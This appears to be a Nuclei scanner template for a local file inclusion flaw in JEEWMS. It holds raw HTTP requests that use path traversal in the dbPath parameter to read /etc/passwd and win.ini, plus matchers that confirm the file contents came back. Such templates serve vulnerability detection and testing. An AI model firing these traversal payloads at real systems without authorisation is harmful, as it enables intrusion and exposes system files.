id: jeewms-lfi info: name: JEEWMS LFI author: pikpikcu severity: high reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g tags: jeewms,lfi requests: - raw: - | #linux GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - | #windows GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - "\\[(font|extension|file)s\\]" condition: or part: body - type: status status: - 200